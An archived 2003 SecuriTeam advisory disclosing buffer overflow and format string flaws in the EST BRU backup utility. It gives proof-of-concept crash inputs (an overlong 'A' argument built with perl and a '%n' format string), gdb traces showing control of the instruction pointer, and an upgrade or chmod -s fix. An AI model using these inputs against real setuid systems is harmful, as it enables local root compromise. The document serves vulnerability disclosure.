[UNIX] BRU Buffer Overflow and Format String Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 07/17/03

  • Next message: SecuriTeam: "[EXPL] EST BRU Backup and Restore Utility Local Root Exploit" 
    To: list@securiteam.com
Date: 17 Jul 2003 19:57:16 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security in Canada

    Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
    We welcome ISPs, system integrators and IT systems resellers
    to promote the most advanced vulnerability assessment solutions today.

    Contact us at 416-482-0038 or at canadasales@beyondsecurity.com

    - - - - - - - - -

      BRU Buffer Overflow and Format String Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.tolisgroup.com> EST BRU(TM) Backup and Restore Utility is
    "the No. 1 award winning product for Linux backup, having won more awards
    and maintained a larger installed base than any other commercial Linux
    backup solution. A respected industry veteran, EST has been developing
    UNIX backup products since 1985". The product has been found to contain
    buffer overflow and format string vulnerabilities.

    DETAILS

    Vulnerable systems:
     * BRU version 17.0 and prior

    The 2 issues at hand can be reproduced as follows:
    elguapo@gentoo elguapo $ /bru/bru `perl -e 'print "A" x 3050'`
    bru: [E155] error - memory fault (SIGSEGV)

    elguapo@gentoo elguapo $ /bru/bru %n%n%n%n
    bru: [E155] error - memory fault (SIGSEGV)

    Both issues appear to be caused by poor usage of vsprintf().

    Starting program: /bin/bru %n%n%n%n%n
    Program received signal SIGSEGV, Segmentation fault.
    0x40071d96 in vfprintf () from /lib/libc.so.6
    (gdb) bt
    #0 0x40071d96 in vfprintf () from /lib/libc.so.6
    #1 0x0805543a in step ()

    Starting program: /bin/bru `perl -e 'print "A" x 3025'`
    Program received signal SIGSEGV, Segmentation fault.
    0x08060027 in step ()
    (gdb) bt
    #0 0x08060027 in step ()
    Cannot access memory at address 0x41414141

    These issues can easily be exploited by an attacker to gain root access.

    Solution:
    Upgrade to the Tolisgroup BRU or chmod -s bru.

    Vendor status:
    The original vendor no longer exists. The Tolisgroup's BRU is not
    vulnerable by default, customers are requested to upgrade to the latest
    version.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:dotslash@snosoft.com> KF.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] EST BRU Backup and Restore Utility Local Root Exploit"

    Relevant Pages